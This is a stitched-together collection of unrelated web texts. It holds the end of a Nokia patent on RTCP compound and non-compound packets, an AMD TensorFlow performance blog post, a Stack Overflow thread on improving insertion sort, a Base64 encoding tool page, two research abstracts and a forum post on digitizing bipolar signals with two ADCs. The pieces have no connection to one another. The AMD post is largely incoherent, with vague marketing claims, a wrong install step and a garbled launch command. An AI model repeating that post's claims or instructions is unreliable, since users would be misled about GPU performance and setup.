RTCP packets (compound or non-compound) is at most as large as N times the speech packet size, where the speech packet size may correspond to the highest of the speech codec modes used in the session (for instance, the highest speech codec mode or the highest of any used subset of the mentioned codec modes). A person of ordinary skill in the art will appreciate that other limits may be established for the size of the RTCP packet in relation to the speech packet size. In accordance with an embodiment of the present invention, N can be, for example, two or more. The speech packet size may or may not include RTP/UDP/IP headers, and the RTP/UDP/IP headers may or may not be compressed. FIG. 
6 illustrates a flow diagram limiting a size of an RTCP packet, in accordance with the second embodiment of the present invention. At step 600, the method defines the RTCP packet as compound or non-compound. At step 610, the method determines whether the speech packet size includes RTP/UDP/IP headers. At step 620, if the speech packet size includes the RTP/UDP/IP headers, the method determines whether the RTP/UDP/IP headers are compressed. At step 630, the method defines a limit on the size of the RTCP packet to be at most as large as N times the speech packet size, where the speech packet size may correspond to the highest of the speech codec modes used in the session. In accordance with a third embodiment of the present invention, an apparatus and method to verify the delivery of a non-compound RTCP packet from a receiver to a sender terminal are provided. The sender terminal, upon reception of an RTCP non-compound packet, may respond to the receiver by inserting some type of information that serves as a positive acknowledgement (for instance, a confirmation binary flag, or a timestamp, the packet type of the just received non-compound packet, etc.) in the RTP and/or RTCP non-compound packets that may be sent to the receiver during the session. A positive acknowledgement in the information from the sender terminal to the receiver would be an indication that the sender terminal has received the RTCP non-compound packet. A person of ordinary skill in the art may appreciate that the sender may repeat the sending of this positive acknowledgement in subsequent packets in order to guarantee that the receiver receives it even under bad radio conditions. FIG. 7 illustrates a method to verify the delivery of a non-compound RTCP packet from a receiver to a sender terminal, in accordance with the third embodiment of the present invention. At step 700, the method receives an RTCP non-compound packet at the sender terminal from the receiver. Upon reception of the RTCP non-compound packet, at step 710, the method may respond to the receiver by inserting some type of information in the RTP and/or RTCP non-compound packets that may be sent to the receiver from the sender terminal during the session. At step 720, the method reads the information in the RTP and/or RTCP non-compound packets. At step 730, the method determines that the information includes a positive acknowledgement from the sender terminal indicating that the sender terminal received the RTCP non-compound packet. A person of ordinary skill in the art may appreciate that the sender may repeat the sending of this positive acknowledgement in subsequent packets in order to guarantee that the receiver receives it even under bad radio conditions. A person of ordinary skill in the art will appreciate that the apparatus and method illustrated in the third embodiment of the present invention may be performed in reverse. That is, the receiver may perform the functions described above performed by the sender and the sender may perform the functions described above performed by the receiver. 
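A rough sketch of the third embodiment's acknowledgement handling, assuming packets are modelled as Python dictionaries and the acknowledgement is a hypothetical 'ack' field (the description deliberately leaves the exact format open, e.g. a flag, a timestamp or a packet type):

    def on_non_compound_rtcp_received(received_pkt: dict, outgoing_pkts: list) -> None:
        # Sender side: piggyback a positive acknowledgement on the RTP and/or
        # non-compound RTCP packets about to be sent back to the receiver.
        # Repeating it on several outgoing packets guards against bad radio conditions.
        ack = {"type": received_pkt["type"], "timestamp": received_pkt["timestamp"]}
        for pkt in outgoing_pkts:
            pkt["ack"] = ack

    def feedback_was_delivered(incoming_pkt: dict, expected_type: str) -> bool:
        # Receiver side: a matching acknowledgement confirms that the sender
        # terminal received the earlier non-compound RTCP packet.
        ack = incoming_pkt.get("ack")
        return ack is not None and ack["type"] == expected_type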
In accordance with a fourth embodiment of the present invention, if a bearer allows sending more than just a single individual non-compound RTCP packet, but the bearer does not allow sending the full compound RTCP packet (because of delay or loss reasons), an apparatus and method may be configured to use semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as a compound packet) are sent together (i.e., stacked) as a semi-compound RTCP packet. FIG. 8 illustrates a method to process semi-compound RTCP packets, in accordance with the fourth embodiment of the present invention. At step 800, the method determines that the bearer allows sending more than just a single individual non-compound RTCP packet, but the bearer does not allow sending the full compound RTCP packet. At step 810, the method configures the RTCP packets as semi-compound RTCP packets including at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as a compound packet). At step 820, the method transmits the semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as a compound packet) are sent together (i.e., stacked) for each semi-compound RTCP packet. It is to be understood that in the embodiments of the present invention, the steps are performed in the sequence and manner as shown although the order of some steps and the like may be changed without departing from the spirit and scope of the present invention. In addition, the methods described in FIGS. 5-8 may be repeated as many times as needed. Embodiments of the present invention can provide a guarantee that RTCP compound packets are limited in size, and that their size does not produce delays or losses because of the RLC layer operations. For efficiency reasons, this maximum size can be clearly defined. If the maximum size is defined, the impact of RTCP traffic on RTP traffic (delay or losses) can be better estimated and managed in a session. Typically in AMR multi-rate operations, the bearer is dimensioned to carry the highest AMR mode in a session. With this reasonable assumption and with the goal of minimizing the size of RTCP compound packets, their size may be limited to be, for instance, three times the size of RTP packets used (in this case, the highest of the AMR modes used in the session gives the best estimate). Note that two times is a common case in practical scenarios, although the present invention is not limited to this scenario. This restriction limits the delay/packet loss effect of RTCP on RTP traffic. If the minimum RTCP transmission interval is very large (for instance, ten seconds), then more weight may be placed on the non-compound RTCP packets. It is possible that only one compound RTCP packet is used at the beginning of a session, and after that, very rarely. This setting could be justified by the fact that a terminal implementation might wish to almost eliminate the use of compound RTCP packets, in order to reduce to zero the potential losses derived from RTCP compound packets. In this case, there may be a problem of conveying the same information that RTCP compound packets are carrying, but using non-compound packets. 
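A minimal sketch of the semi-compound stacking described above, reusing the second embodiment's limit of N times the speech packet size as the size budget; the function name, the byte-string packet model and the default N = 2 are assumptions of the sketch:

    def build_semi_compound(individual_packets, speech_packet_bytes: int, n: int = 2):
        # Stack individual (non-compound) RTCP packets into one semi-compound
        # packet while staying within the size budget. At least two packets must
        # fit, and fewer than all of them are stacked (otherwise the result would
        # simply be the full compound packet).
        size_limit = n * speech_packet_bytes
        stacked, used = [], 0
        for pkt in individual_packets[:-1]:       # never stack every packet
            if used + len(pkt) > size_limit:
                break
            stacked.append(pkt)
            used += len(pkt)
        if len(stacked) < 2:                      # bearer only fits one: no semi-compound
            return None
        return b"".join(stacked)

    # e.g. AMR 12.2 kbps payload of 32 bytes plus roughly 9 bytes of compressed
    # headers (the figures quoted earlier in the text), so a budget of 2 x 41 = 82 bytes
    semi = build_semi_compound([b"A" * 30, b"B" * 30, b"C" * 30], speech_packet_bytes=41)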
Non-compound packets can be used not only to carry APP packets for adaptation, but also SR, RR and SDES packets. There is no doubt that the information contained in these packets is very useful to a session participant. SR, RR and SDES packets may be carried over non-compound RTCP packets for example in a cyclic way. In practice, a compound RTCP packet may be fragmented and sent over several non-compound RTCP packets. If space allows (within the limits of RTCP packets) more than one non-compound RTCP packet can be stacked to form a semi-compound RTCP packet (smaller than a compound RTCP packet), to increase efficiency. Sending SR, RR and SDES packets over non-compound RTCP packets allows conveying useful feedback that would otherwise not be carried, or be carried much more infrequently, and avoids the losses derived from the usage of RTCP compound packets. According to one embodiment of the invention, the method steps performed in FIGS. 5-8 may be performed by a computer program product embodied on a computer-readable medium, encoding instructions for performing at least the method described in FIGS. 5-8. The computer program product can be embodied on a computer readable medium. The computer program product can include encoded instructions for processing location configuration protocol determination flow, which may also be stored on the computer readable medium. The computer program product can be implemented in hardware, software, or a hybrid implementation. The computer program product can be composed of modules that are in operative communication with one another, and which are designed to pass information or instructions to a communications device such as a user equipment or network node. The computer program product can be configured to operate on a general purpose computer or an application specific integrated circuit (ASIC). Certain embodiments of the present invention offer advantages such as resolving the problem of an excessive length of compound RTCP packets, by fragmenting each compound RTCP packet into smaller non-compound packets and sending them spaced over time, which reduces or eliminates the problem of the packet losses generated by long RTCP packets. Embodiments of the present invention can guarantee that RTCP non-compound packets provide functionality equivalent to RTCP compound packets, because they provide the same information to the receiver (SR, RR, SDES, etc.), and the receiver is not lacking any feedback information. The information may be provided spread in time, and not in a single compound packet. The embodiments of the present invention can also remove or minimize the impact of the RTCP traffic on the RTP traffic, in terms of additional delay or losses. The embodiments of the present invention also allow, at least, the receiver to verify that its feedback sent over RTCP non-compound packets has really been received. Certain embodiments of the present invention further allow, at least, making maximum usage of the bearer capabilities. For example, if there is enough space (in an RLC frame) to send two RTCP non-compound packets together (but not enough space to send the full RTCP compound packet made of three non-compound packets), then these are sent as a semi-compound RTCP packet. 
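The cyclic carrying of SR, RR, SDES and APP information over successive non-compound packets could be sketched as a simple round-robin generator; build_app, build_sr and the other builders are hypothetical callables that each produce one individual RTCP packet:

    from itertools import cycle

    def non_compound_scheduler(report_builders):
        # Round-robin generator: each call yields the next individual RTCP packet
        # so that the information of a compound packet is spread over successive
        # non-compound packets within the reporting interval.
        for build in cycle(report_builders):
            yield build()

    # sched = non_compound_scheduler([build_app, build_sr, build_sdes, build_rr])
    # next(sched)  # first an APP packet, then an SR packet, then an SDES packet, ...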
In accordance with an embodiment of the present invention, the apparatus may include any type of controller, mobile or non-mobile network element including, but not limited to, a processor, a mobile station, a laptop, a user equipment, a wireless transmit/receive unit, a fixed or mobile subscriber unit, a mobile telephone, a computer (fixed or portable), a pager, a personal data assistant or organizer, or any other type of network element capable of operating in a wireless environment or having networking capabilities. In addition, while the term data has been used in the description of the present invention, the invention applies to many types of network data. For purposes of this invention, the term data includes packet, cell, frame, datagram, bridge protocol data unit packet, packet data and any equivalents thereof. The many features and advantages of the invention are apparent from the detailed specification and, thus, it is intended by the appended claims to cover all such features and advantages of the invention which fall within the spirit and scope of the invention. Further, since numerous modifications and changes will readily occur to those skilled in the art, it is not desired to limit the invention to the exact construction and steps illustrated and described, and accordingly all suitable modifications and equivalents may be resorted to, falling within the scope of the invention.
Patent Citations:
US7756108, filed 2 Nov 2004, published 13 Jul 2010, Nokia Corporation, "Transmission of voice over a network"
US20040165527*, filed 5 Dec 2003, published 26 Aug 2004, Xiaoyuan Gu, "Control traffic compression method"
US20060050705*, filed 5 Aug 2005, published 9 Mar 2006, LG Electronics Inc., "Distinguishing between protocol packets in a wireless communication system"
US20060069799*, filed 17 Oct 2003, published 30 Mar 2006, Frank Hundscheidt, "Reporting for multi-user services in wireless networks"
US20060187927*, filed 6 Mar 2006, published 24 Aug 2006, Patrick J. Melampy, "System and method for providing rapid rerouting of real-time multi-media flows"
US20070153914*, filed 29 Dec 2005, published 5 Jul 2007, Nokia Corporation, "Tune in time reduction"
US20100020713*, filed 14 Dec 2007, published 28 Jan 2010, Tomas Frankkila, "Dividing RTCP bandwidth between compound and non-compound RTCP packets"
Non-Patent Citations:
1. 3GPP, "Multimedia Telephony; media handling and interaction", Release 7, TS 26.114, Mar. 2007.
2. Change Request on "addition of non-compound RTCP", Ericsson, Tdoc S4-070264, 3GPP SA4#43, Rennes, France, Apr. 23-27, 2007.
3. "Handling of variable data rates for conversational IMS", Siemens, Tdoc R2-030237, 3GPP RAN2#34, Sophia Antipolis, France, Feb. 17-21, 2003.
4. I. Johansson, M. Westerlund, "Support for non-compound RTCP in RTCP AVPF profile, opportunities and consequences", IETF draft, draft-johansson-avt-rtcp-avpf-non-compound-01, Mar. 5, 2007.
5. International Search Report and Written Opinion of the International Searching Authority for PCT Application No. PCT/IB2008/000988, dated Apr. 24, 2009, 19 pages.
6. "Non-compound RTCP in MTSI", Ericsson, Tdoc S4-070263, 3GPP SA4#43, Rennes, France, Apr. 23-27, 2007.
7. Ott et al., "Extended RTP Profile for Real-Time Transport Control Protocol (RTCP) Based Feedback (RTP/AVPF)", IETF Standard, Internet Engineering Task Force, Jul. 1, 2006.
8. "RAB support for IMS", 3GPP TR 25.xxx V0.0.0 (Nov. 2003), 3rd Generation Partnership Project, Technical Specification Group Radio Access Network, Release 6, 13 pages.
9. "Radio Link Control (RLC) Protocol Specification", 3GPP TS 25.322 (Release 7), Mar. 2006.
10. "RTCP Handling: Separation or Multiplexing", Alcatel, Tdoc S2-033598, 3GPP SA2#35, Bangkok, Thailand, Oct. 27-21, 2003.
11. "RTCP optimization usage for VoIMS", Nokia, Tdoc S4-030770, 3GPP SA4#29 meeting, Tampere, Finland, Nov. 24-28, 2003.
12. "RTCP Removal", Three, Tdoc S2-033136, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003.
13. "RTP-RTCP Multiplexing", Three, Tdoc S2-033127, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003.
14. "RTP-RTCP Separation", Three, Tdoc S2-033128, 3GPP SA2#34, Brussels, Belgium, Aug. 25-29, 2003.
15. Schulzrinne et al., "RTP: A Transport Protocol for Real-Time Applications", IETF RFC 3550, Jul. 2003.
16. Westerlund et al., "Support for non-compound RTCP in RTCP AVPF Profile, Opportunities and Consequences", IETF Standard Working Draft, Internet Engineering Task Force, No. 1, Mar. 5, 2007.
Classifications:
U.S. Classification: 370/389, 370/252, 709/232, 370/392, 370/465
International Classification: H04L12/56
Cooperative Classification: H04L65/1016, H04L65/80, H04L65/608
Legal Events:
23 Oct 2009, Assignment: assignor Curcio, Igor Danilo Diego to Nokia Corporation, Finland (reel/frame 023414/0104), effective 22 Oct 2009.
30 Apr 2013, Certificate of correction.
1 May 2015, Assignment: assignor Nokia Corporation to Nokia Technologies Oy, Finland (reel/frame 035544/0616), effective 16 Jan 2015.
25 Aug 2016, Fee payment (year of fee payment: 4).
AMD Deep Learning TensorFlow Performance AMD provides a powerful platform for training and deploying Deep Learning models with TensorFlow. This blog describes the performance of AMD hardware for TensorFlow. Checkout this video: Introduction to AMD Deep Learning and TensorFlow Performance AMD deep learning is a new technology that allows for more efficient and effective training of deep learning models. In this article, we will explore what AMD deep learning is, how it works, and how it can be used to improve TensorFlow performance. AMD deep learning technology is based on two main concepts: collaboration and coordination. By collaborating with other devices, AMD deep learning-enabled devices can share resources and knowledge, which leads to more efficient training. Coordination between devices is also important, as it allows for the distribution of training tasks across multiple devices. This leads to shorter training times and less overall energy consumption. In terms of TensorFlow performance, AMD deep learning-enabled devices can provide up to 2x faster performance than traditional GPUs. This means that you can train your models faster and use less energy in the process. Additionally, AMD deep learning-enabled devices offer better scalability than traditional GPUs, meaning that you can use more devices in parallel without sacrificing performance. How AMD’s Deep Learning Solution Performs AMD has released a new deep learning solution that offers excellent performance for training and inference workloads. The company claims that its new solution is up to twice as fast as NVIDIA’s Tesla V100 in some cases, making it the fastest deep learning solution on the market. In this article, we will take a look at how AMD’s deep learning solution performs in comparison to NVIDIA’s Tesla V100. We will also compare its performance to other deep learning solutions from major companies such as Google, Facebook, and Microsoft. Why AMD’s Deep Learning Solution is Ideal for TensorFlow When it comes to deep learning, training speed is critical. The faster you can train your models, the more experiments you can run and the better your results will be. AMD’s deep learning solution is designed for speed, offering up to 2X the performance of other solutions on key deep learning workloads like TensorFlow. But speed isn’t the only important factor. Deep learning models are getting increasingly complex, so you need a solution that can handle large models without breaking a sweat. AMD’s deep learning solution is optimized for size as well as speed, offering up to 4X the memory bandwidth of other solutions. This means you can train larger, more complex models without sacrificing performance. If you’re looking for a deep learning solution that offers the best of both worlds – speed and scalability – AMD is the way to go. What is TensorFlow and What Can it do? TensorFlow is a powerful open-source software library for data analysis and machine learning. Originally developed by Google Brain team researchers, TensorFlow is widely used by leading tech companies, including Instagram, Dropbox, Airbnb, and Samsung. TensorFlow allows developers to build and train sophisticated machine learning models to improve the performance of their products and services. TensorFlow Basics TensorFlow is one of the most popular deep learning frameworks available today. Created by Google, TensorFlow allows developers to create sophisticated machine learning and deep learning models quickly and easily. 
While TensorFlow can be used for a variety of tasks, it is most commonly used for image recognition and classification. AMD GPUs are well-suited for deep learning tasks such as image recognition and classification. In fact, AMD GPUs offer up to twice the deep learning performance of NVIDIA GPUs*. In this article, we will show you how to get started with TensorFlow on AMD GPUs. *Based on 3rd party testing https://www.amd.com/en/technologies/tensorflow TensorFlow on AMD GPUs TensorFlow is a powerful open-source software library for data analysis and machine learning. AMD GPUs are capable of delivering excellent performance for TensorFlow workloads. In this guide, we will show you how to get the most out of your AMD GPU when running TensorFlow. We will cover the following topics: -Installing TensorFlow on AMD GPUs -Configuring TensorFlow for optimal performance on AMD GPUs -Running TensorFlow workloads on AMD GPUs TensorFlow Performance on AMD GPUs TensorFlow is a popular deep learning framework that can be used to train machine learning models on AMD GPUs. In this article, we’ll take a look at the performance of TensorFlow on AMD GPUs and compare it to other popular deep learning frameworks. We’ll start by looking at the performance of TensorFlow on different types of AMD GPUs. We’ll then compare the performance of TensorFlow on AMD GPUs to the performance of other popular deep learning frameworks, such as Caffe2 and PyTorch. From our results, we can see that TensorFlow performs well on all types of AMD GPUs. In particular, TensorFlow shows good performance on the Vega 64 and Vega Frontier Edition GPUs. TensorFlow also compares favorably to other deep learning frameworks, such as Caffe2 and PyTorch. Conclusion In conclusion, AMD’s new 7nm Vega GPU architecture offers excellent deep learning TensorFlow performance compared to competing NVIDIA GPUs. For example, the Radeon VII offers nearly double the performance of the NVIDIA RTX 2080 Ti at a fraction of the cost. This makes AMD’s 7nm Vega GPU architecture a great choice for Deep Learning TensorFlow applications. References Most of the popular deep learning frameworks have bindings for AMD GPUs. This means that you can train your models using AMD GPUs and reap the benefits of faster performance. However, there are some things to keep in mind when using AMD GPUs for deep learning. In this article, we will go over some tips to get the most out of your AMD GPU when training deep learning models in TensorFlow. Before we get started, let’s take a look at the hardware that we’ll be using. For this article, we will be using an AMD Radeon VII 16GB GPU. This is a high-end gaming GPU that is also good for deep learning. It has plenty of memory and powerful compute capabilities. Now that we have a good idea of the hardware we’ll be using, let’s get started with the tips! 1. Use a recent version of TensorFlow: TensorFlow 1.12 or newer is needed for AMDGPU support. You can installTensorFlow 1.12 from pip like this: pip install tensorflow==1.12 . Alternatively, you can use the pre-compiled binaries from the TensorFlow website . Be sure to select the version that matches your system (we’ll be using CPU-only for this example). 2. Set up your environment: Before you can use your AMD GPU with TensorFlow, you need to set up some environment variables . The easiest way to do this is to add these lines to your ~/.bashrc file: export TF_NEED_ROCM=1 export PATH=/opt/rocm/bin:$PATH 3. Install ROCm: ROCm stands for Radeon Open Compute Platform . 
It is a set of open source tools and drivers for Radeon GPUs. You can install it from their website. Be sure to select the version that matches your system (we’ll be using ROCm 2.0). 4. Run TensorFlow: Now you’re ready to run TensorFlow! Just type python3 and CUDA_VISIBLE_DEVICES=0 tf_gpu into your terminal. You should see something like this: Python 3.6
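Since the launch command quoted above appears garbled, a short sanity check in Python may be more useful; this sketch assumes a ROCm-enabled TensorFlow 1.x build is installed (the ROCm builds are usually published on pip as tensorflow-rocm, whereas the post installs plain tensorflow):

    import tensorflow as tf
    from tensorflow.python.client import device_lib

    def list_devices():
        # Print every device TensorFlow can see; on a working ROCm setup the
        # Radeon GPU should appear as a /device:GPU:N entry.
        for dev in device_lib.list_local_devices():
            print(dev.name, dev.physical_device_desc)

    if __name__ == "__main__":
        print("GPU available:", tf.test.is_gpu_available())
        list_devices()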
i know insertion sort isn't that great...but even still...what are two more simple improvements that could be made to the sort below?
public static void insertion_sort_with_moves(int[] arr){
    for (int i = 1; i <= arr.length; i++){
        int v = arr[i-1];
        int j = i-1;
        for (/*declared j outside loop*/; j > 0; j--) {
            //compswap(a[j-1], a[j]);
            if (v < arr[j-1]) arr[j] = arr[j-1];
            else break;
        }
        arr[j] = v;
    }
}
Comments: Proving its correctness is very useful. So is making it generic. – larsmans Feb 23 '11 at 18:50 | Is this homework? – corsiKa Feb 23 '11 at 18:51 | Why 2 improvements? Why not 1 or 3? – jzd Feb 23 '11 at 18:51 | There is no reason to declare j outside the for; it could be done like 'for (int j = i - 1; …)' instead. – Haakon Feb 23 '11 at 18:53 | Because it's Java, any variables that are not going to change after being declared in the loop could be declared final. This allows the compiler to make certain optimizations it wouldn't be able to otherwise. – corsiKa Feb 23 '11 at 18:54
3 Answers
Answer 1 (accepted): A few micro-optimizations are:
1,2,3)
int len = arr.length;
...
for (int i = 0; i < len; ++i){
    int v = arr[i];
    int j = i;
Saves you from computing i-1 two times and ++i is faster than i++. Not sure about the length thing (could save the offset addition when accessing a class member).
4,5)
for (/*declared j outside loop*/; j != 0; --j) {
j!=0 should be faster than j>0 (really don't expect much) and --j is faster than j--. Well most of them may be platform dependent and may make no difference at all.
Answer 2: One thing that comes to mind is that you could use a binary search on the sorted part of the array to find where it belongs and use System.arraycopy to move the subarray over by one more efficiently than iterating through. You're still O(n^2) but on large arrays it will be a small improvement. Another is to declare any variables that won't change as final to allow for compiler optimization (as I noted in my comment.)
Answer 3: Updated based on comments: Some improvements to help readability: 1. Don't use underscores in your method names. Use camel case instead. 2. Consider curly braces around if/else statements to make them easier to read or at least put in more new lines. 3. Remove code that is commented out if it is not needed. 4. Consider removing comments that explain "what" instead of "why". 5. Try to avoid one character variables especially when you have several in the same scope. 6. You might be able to make use of a for each loop rather than having to declare and access the v variable. (Would still need the current index, but other changes might allow this)
Comments on Answer 3: Does that really improve the sort itself? I'm pretty sure he's looking for code improvements, even if it doesn't explicitly say that. – corsiKa Feb 23 '11 at 18:55 | @glowcoder, yes the more readable it is the more potential for bugs to be found and improvements to be identified. – jzd Feb 23 '11 at 18:56 | Extra curly braces are not an improvement. Proper indentation is. – larsmans Feb 23 '11 at 18:59 | @jzd Those are a matter of style, not performance. In fact, it is very common to have a rule that says "If statements must have curly braces, even for one liners, unless the entire statement is on the same line as the if statement." 
And while almost every Java developer uses camelCase instead of underscores, it has 0 impact on finding bugs in the method. – corsiKa Feb 23 '11 at 19:00 | Also, I should point out i'm not the downvoter. I do find your statements potentially useful, just not to answering the question at hand :-) – corsiKa Feb 23 '11 at 19:04
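To make the binary-search suggestion from Answer 2 concrete, here is a rough sketch of the idea in Python rather than the question's Java, purely as an illustration (the slice-assignment shift plays the role of System.arraycopy):

    from bisect import bisect_right

    def binary_insertion_sort(arr):
        # Insertion sort that finds the insertion point with binary search,
        # giving O(log n) comparisons per element; the shift itself is still
        # O(n), so the overall complexity remains O(n^2) as the answer notes.
        for i in range(1, len(arr)):
            value = arr[i]
            pos = bisect_right(arr, value, 0, i)   # where value belongs in arr[:i]
            arr[pos + 1:i + 1] = arr[pos:i]        # shift the tail right by one slot
            arr[pos] = value
        return arr

    # binary_insertion_sort([5, 2, 4, 6, 1, 3])  ->  [1, 2, 3, 4, 5, 6]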
Encode a string as base64: Base64 (MIME) Encode Tool Use this free tool to turn binary data into text (encode) or text into binary (decode). To allow binary data to be transmitted with textual data it must be encoded. An example of this is an attachment in an email. This is done via the MIME implementation of Base64. The MIME implementation uses the characters A-Z, a-z, and 0-9 for the initial 62 values, plus "+" and "/" for the remaining two, to encode data. For example, the text: Dan's Tools are cool! Would be encoded as... RGFuJ3MgVG9vbHMgYXJlIGNvb2wh What is Base64 encoding? The term Base 64 is generic, and there are many implementations. MIME, which stands for Multi-Purpose Internet Mail Extensions, is the most common that is seen today. It is used to transmit attachments via email over the Simple Mail Transfer Protocol (SMTP). Other examples of Base64 encoding are Radix-64 and YUI's Y64. Encoding data in Base64 results in it taking up roughly 33% more space than the original data. MIME Base64 encoding is the most common, and is based on the RFC 2045 (MIME) specification. It also uses one or two = characters to pad the end of the output when the input length is not a multiple of three bytes. When and why would you use Base64 encoding? You should use Base64 whenever you intend to transmit binary data in a textual format.
Code Examples:
PHP: encode base64_encode($string); decode base64_decode($string);
Perl: encode encode_base64($string); decode decode_base64($string); requires use MIME::Base64;
C#: encode System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(plainTextBytes)); decode System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(base64EncodedData));
Java: encode Base64.encodeBase64(string); decode Base64.decodeBase64(string); requires import org.apache.commons.codec.binary.Base64;
JavaScript: encode btoa(string); decode atob(string); <= IE9 is unsupported
Ruby: encode Base64.encode64('string'); decode Base64.decode64(enc); requires require "base64"
External Links: More information about Base64 (Wikipedia)
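The table above does not list Python; for completeness, a round trip with Python's standard base64 module reproduces the page's example string:

    import base64

    text = "Dan's Tools are cool!"
    encoded = base64.b64encode(text.encode("utf-8"))      # b'RGFuJ3MgVG9vbHMgYXJlIGNvb2wh'
    decoded = base64.b64decode(encoded).decode("utf-8")   # "Dan's Tools are cool!"
    assert decoded == text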
The Collection System of Eye Movements for Psychological Disorder Dong Hyun Kim, Hyun Woo Lee, Young Sil Lee Abstract: ADHD is one of the psychological disorders of children, and the National Health Insurance of Korea reported that 55,000 infants and children had ADHD in 2014. Since the features of ADHD lead to various side effects, such as learning disability and memory problems, it is necessary to diagnose ADHD in childhood and start the treatment of ADHD early. However, it is difficult to diagnose ADHD in childhood if the child does not show hyperactivity symptoms. Also, since the questions are too specialized or the diagnostic test requires cognitive and activity abilities, children have difficulty understanding the questions and showing the proper response. To solve this problem, we propose a collection system of eye movements for ADHD diagnosis. The proposed system displays four types of Korean text: a letter, a word, a sentence and a paragraph. When a subject watches the sample texts, the system collects the coordinates and time of eye movements and transforms them into gaze pattern data for ADHD diagnosis. The benefit of the proposed system is that no physical intervention on the subject is required to collect the diagnostic data during the assessment for ADHD. Keywords: psychological disorder, ADHD, eye movements, eye tracker, machine learning. Paper Details: Month 3, Year 2020, Volume 24, Issue 7, Pages 2068-2075.
The Journal of Adhesive Dentistry, J Adhes Dent 21 (2019), No. 3 (07.06.2019), Pages 219-228, doi:10.3290/j.jad.a42305, PubMed:31165104. Remineralization Potential of Calcium and Phosphate-based Agents and Their Effects on Bonding of Orthodontic Brackets. Uy, Erika / Ekambaram, Manikandan / Lee, Gillian Hiu Man / Yiu, Cynthia Kar Yung. Purpose: To compare the remineralization potential of Clinpro Tooth Crème (CTC, 3M Oral Care) containing functionalized tricalcium phosphate (fTCP), Tooth Mousse (TM, GC) containing casein phosphopeptide amorphous calcium phosphate (CPP-ACP), and Tooth Mousse Plus (TMP, GC) containing casein phosphopeptide amorphous calcium phosphate with fluoride (CPP-ACPF) and their effects on the shear bond strength (SBS) of orthodontic brackets to enamel. Materials and Methods: In Part I of the study, 51 premolars were divided into 3 groups: 1: fTCP; 2: CPP-ACP; 3: CPP-ACPF. Artificial carious lesions were created and immersed in remineralizing solution for 30 days. Specimens were evaluated using Knoop microhardness and transverse microradiography. The percentage of surface hardness recovery (%SHR), change in lesion depth (∆LD), and mineral loss (∆∆Z) were analyzed using one-way ANOVA. In Part II of the study, 80 premolars were divided into 5 groups: A: brackets bonded to sound enamel; B: brackets bonded to demineralized enamel (DE); C-E: demineralized enamel immersed in remineralizing solution containing fTCP (group C), CPP-ACP (group D), or CPP-ACPF (group E) before bracket bonding. The SBS of half of the specimens were tested immediately, while the other half were tested after thermocycling. Data were analyzed using two-way ANOVA. Results: TMP showed significantly higher %SHR, ∆LD and ∆∆Z compared to the other groups (p < 0.05). Both control and TMP had the highest SBSs and demineralized enamel the lowest, irrespective of thermocycling. No significant difference in SBS was found between TM and TMP after thermocycling. Conclusions: Tooth Mousse Plus achieved significant remineralization of artificial enamel carious lesions without adverse effect on shear bond strength of orthodontic brackets to remineralized enamel. Keywords: calcium and phosphate-based agents, enamel bonding, orthodontic brackets, remineralization
TOPIC: Double Span and Digitize Signals Using Two ADCs
Posted by JR (Senior Member), 6 years 6 months ago, #27
I copy/paste here the article by Mike McGlinchy in Electronic Design because in that website the images are not showing properly. pedalSHIELD is compatible with the arrangement described by M. McGlinchy by placing the jumper1:
By splitting the input signal into positive and negative portions and digitizing separately, this circuit allows a microcontroller's unipolar ADC to handle bipolar signals and double its input range without compromising resolution.
[Figure 1]
Many microcontrollers (MCUs) incorporate onboard analog-to-digital converters (ADCs), usually with many multiplexed input channels. However, these ADCs are typically unipolar, able to handle only signals that are between the positive and negative reference voltages (+VREF to –VREF), with –VREF usually 0 V. To accommodate negative voltages, then, these ADCs need some form of signal conditioning. The typical approach uses an op-amp dc level shifter that raises the signal by one half of +VREF so the entire analog signal excursion lies within the positive domain where the ADC can handle it. But there are two drawbacks to this approach. One is that shifting the signal cuts the positive headroom in half. Another drawback is the need for additional math firmware to remove the signal shift, which can reduce, perhaps significantly, the overall signal conversion rate.
This alternative approach breaks the incoming signal into its positive and negative components and digitizes them independently. It utilizes two of the microcontroller's ADC channels along with a 4.096-V external voltage reference diode, two Schottky diodes, and both halves of a dual op amp. Considering that the ADC likes a low-impedance signal source (typically 10 kΩ, but a lower value is preferable for faster throughput), op amps are usually needed in a design to buffer a high-impedance signal or sensor into a low impedance. Therefore, the dual op amp used here cannot really be considered an "extra" part.
The design example uses a midrange microcontroller, the PIC16F876 (U3), shown with only the pin connections pertaining to this technique (Fig. 1). The two halves of the op amp form a voltage follower with gain +1 (U1A) attached to the signal input, followed by an inverter with gain –1 (U1B). The output of U1A attaches to analog input AN0 (U3, pin 2) through current-limiting resistor R1. Similarly, U1B attaches to AN1 through R4. When VIN is positive, say +4.00 V, U1A will present +4.00 V to AN0. Meanwhile, U1B will have –4.00 V on its output, but the low-voltage-drop Schottky diode clips the negative voltage seen at AN1 (U3, pin 3) to about –0.24 V. Similarly, if VIN is –4.00 V, U1B will present +4.00 V to AN1 while D1 clips the –4.00 V from U1A to about –0.24 V at AN0. Clipping the outputs in this way prevents a signal more negative than –0.30 V from appearing at either ADC input. Too negative a voltage at one input could cause current injection that would alter the other ADC channel's results. The sample waveforms show a symmetrical 8-V p-p sine wave at VIN with the corresponding signals seen at the two ADC input channels (Fig. 2). The ADC will read any value equal to or below 0 V as zero.
[Figure 2]
The firmware to read the input signal must first select ADC channel 0 (AN0) and wait for the acquisition time of 40 µs or so, then trigger the ADC conversion. If the reading is not zero, then VIN is a positive voltage. Because VREF is 4.096 V, or 4 mV × 1024, the ADC reading is not the actual voltage but the number of 4-mV steps in the signal. If you need an exact voltage rather than a relative value, the firmware must multiply by four before storing the reading in RAM. (Two 8-bit locations will be needed because this is a 10-bit converter.) If the reading for AN0 is zero, the firmware must select ADC channel 1 (AN1) and wait another 40 µs before performing a second conversion. If this result is not zero (for example, it's 1.50 V), then VIN is negative (–1.50 V) and the firmware should convert the reading to a negative number before storing. If both AN0 and AN1 read as zero, then VIN = 0 V.
